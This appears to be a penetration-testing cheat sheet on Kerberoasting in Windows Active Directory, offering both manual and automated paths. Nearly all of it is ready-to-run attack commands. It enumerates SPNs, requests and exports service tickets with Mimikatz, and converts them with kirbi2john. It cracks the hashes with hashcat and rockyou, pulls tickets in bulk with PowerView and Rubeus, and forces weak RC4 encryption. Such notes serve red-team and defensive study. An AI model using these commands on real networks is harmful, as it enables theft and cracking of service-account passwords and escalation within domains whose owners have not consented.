Windows
Semi Manual method
# Enumerating SPNs with setspn.exe
C:\> setspn.exe -Q */*
# Requesting tickets and loading them into memory
# Targeting a Single User
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\pow> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.domain.local:1433"
# Extracting Tickets from Memory with Mimikatz
mimikatz # base64 /out:true
mimikatz # kerberos::list /export
# Preparing the Base64 Blob for Cracking
echo "<base64 blob>" | tr -d \\n
# Placing the Output into a File as .kirbi
cat encoded_file | base64 -d > sqldev.kirbi
# Using kirbi2john.py tool to extract the Kerberos ticket from the TGS file.
# too link : <https://raw.githubusercontent.com/nidem/kerberoast/907bf234745fe907cf85f3fd916d1c14ab9d65c0/kirbi2john.py>
python2.7 kirbi2john.py sqldev.kirbi
# Modifiying crack_file for Hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
# Cracking the Hash with Hashcat
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt
Automated
# Using PowerView to Extract TGS Tickets
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-DomainUser * -spn | select samaccountname
# Using PowerView to Target a Specific User
PS C:\> Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
# Exporting All Tickets to a CSV File
PS C:\> Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\output_tgs.csv -NoTypeInformation
# Then We can crack using hashcat
# Using the /stats Flag
PS C:\> .\Rubeus.exe kerberoast /stats
# Using the /nowrap Flag
PS C:\> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
# RC4 is easier to crack than AES or other encryption algorithms
# Using the /tgtdeleg Flag to request onlt RC4 encrypted tickets
PS C:\> .\Rubeus.exe kerberoast /tgtdeleg /user:testspn /nowrap
Last updated